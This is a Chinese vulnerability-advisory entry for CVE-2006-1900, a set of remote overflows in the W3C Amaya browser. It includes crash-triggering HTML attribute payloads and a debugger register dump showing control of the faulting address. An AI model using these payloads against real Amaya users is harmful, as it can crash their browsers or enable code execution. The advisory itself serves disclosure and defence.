W3C Amaya多个远程溢出漏洞 CVE-2006-1900 CNNVD-200604-389 CNVD-2006-2282

7.6 AV AC AU C I A
发布: 2006-04-20
修订: 2018-10-18

W3C的Amaya是一个所见即所得的Web浏览器和认证程序。 Amaya实现上存在多个漏洞,远程攻击者可能导致程序崩溃或执行任意指令。 以下代码段(可能还有其他类似的代码段)可以强迫Amaya崩溃: > <colgroup compact=\"Ax200\"> > [...] > <textarea rows=\"Ax200\"> > eax=000000f9 ebx=02ae8420 ecx=77bcec76 edx=41414141 esi=007b9420 > edi=01ae6d5c eip=004edd95 esp=0012e7ac ebp=007d6110 iopl=0 > cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206 > > 004edd61 03f3 add esi,ebx > 004edd63 a4 movsb > 004edd64 8b4500 mov eax,[ebp] > 004edd67 8b8c241c010000 mov ecx,[esp+0x11c] > 004edd6e 8b942418010000 mov edx,[esp+0x118] > 004edd75 50 push eax > 004edd76 51 push ecx > 004edd77 53 push ebx > 004edd78 52 push edx > 004edd79 e8a23c0200 call amaya+0x111a20 (00511a20) > 004edd7e 53 push ebx > 004edd7f e83cf90000 call amaya+0xfd6c0 (004fd6c0) > 004edd84 83c428 add esp,0x28 > 004edd87 8bbc24fc000000 mov edi,[esp+0xfc] > 004edd8e 8b942400010000 mov edx,[esp+0x100] > FAULT ->004edd95 8b4240 mov eax,[edx+0x40] > ds:0023:41414181=???????? > 004edd98 83f844 cmp eax,0x44 > 004edd9b...

0%
当前有4条漏洞利用/PoC
当前有1条受影响产品信息